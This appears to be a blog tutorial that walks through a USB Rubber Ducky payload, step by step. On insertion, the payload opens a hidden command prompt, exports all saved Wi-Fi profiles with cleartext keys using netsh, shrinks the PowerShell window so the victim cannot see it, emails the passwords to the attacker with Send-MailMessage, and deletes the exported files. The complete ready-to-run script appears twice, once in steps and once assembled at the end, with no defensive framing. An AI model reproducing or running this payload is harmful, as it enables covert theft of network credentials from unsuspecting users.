Imagine you plug a USB stick into your PC and within a few seconds you get an email containing all passwords. Sounds very complicated now, but it’s really not.
What is a Rubber Ducky?
You can imagine it like a keyboard but in the form of a USB stick. That means everything you give the Rubber Ducky as a command it can execute. For example it opens programs, enters commands in CMD or Powershell. It can do everything you can do with a keyboard. In the heart of the stick is a microSD card, on which you can store any key sequences, which are then played when plugged in.
How do I have to proceed to read out all WLAN passwords?
It is important to know that this is a ready to use script, so you can try it without Rubber-Ducky. Just leave out STRING, DELAY, ENTER and so on and enter it into your CMD.
It is very simple to start with you open a CMD with the Rubber Ducky. It would be also desirable if one returns first to the Desktop that no more programs are open. It would also be good to make the attack invisible so that the user who inserts the USB stick can not see which commands are executed.
DELAY 3000 WINDOWS d DELAY 100 WINDOWS r DELAY 200 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K ENTER
- After that we want to get to the desktop so that everything we do is saved to the desktop using this command:
STRING cd "%USERPROFILE%\Desktop" ENTER
- There we create the folder WiFi_Passwords
STRING md WiFi_Passwords ENTER
- After that we export all profiles with passwords of all WLANs to this folder:
STRING netsh wlan export profile folder="%USERPROFILE%\Desktop"\WiFi_Passwords\ key=clear ENTER
- After all have been saved, we send everything to us via email. But these commands only work via Powershell. So we open them and minimize this window so that you can not see what was entered:
STRING powershell ENTER DELAY 200 STRING [console]::WindowHeight=1 ENTER STRING [console]::WindowWidth=1 ENTER
- Now we come to one of the most difficult points – sending the email with the content of the Wi-Fi passwords:
STRING Send-MailMessage -To "Empfänger@gmail.com" -Subject "WLAN Passwort" -Body (Get-Content WiFi_Passwords\*.xml | out-string) -SmtpServer "SMTP-Server" -From "Sender@gmail.com" ENTER DELAY 700
- Here just add your email and SMTP server instead of reciever@mail.com, transmitter@mail.com and SMTP server.
I would recommend to use always small delays to not overload the PC.
Last but not least I would delete the folder and all the files it contains:
STRING del WiFi_Passwords ENTER STRING J ENTER STRING rd WiFi_Passwords & exit ENTER
- Now the finished script at the end:
DELAY 3000 WINDOWS d DELAY 100 WINDOWS r DELAY 200 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K ENTER DELAY 100 STRING cd "%USERPROFILE%\Desktop" ENTER STRING md WiFi_Passwords ENTER STRING netsh wlan export profile folder="%USERPROFILE%\Desktop"\WiFi_Passwords\ key=clear ENTER DELAY 200 STRING powershell ENTER DELAY 200 STRING [console]::WindowHeight=1 ENTER STRING [console]::WindowWidth=1 ENTER STRING Send-MailMessage -To "Empfänger@gmail.com" -Subject "WLAN Passwort" -Body (Get-Content WiFi_Passwords\*.xml | out-string) -SmtpServer "SMTP-Server " -From "Sender@gmail.com" ENTER DELAY 700 STRING exit ENTER DELAY 100 STRING del WiFi_Passwords ENTER STRING J ENTER STRING rd WiFi_Passwords & exit ENTER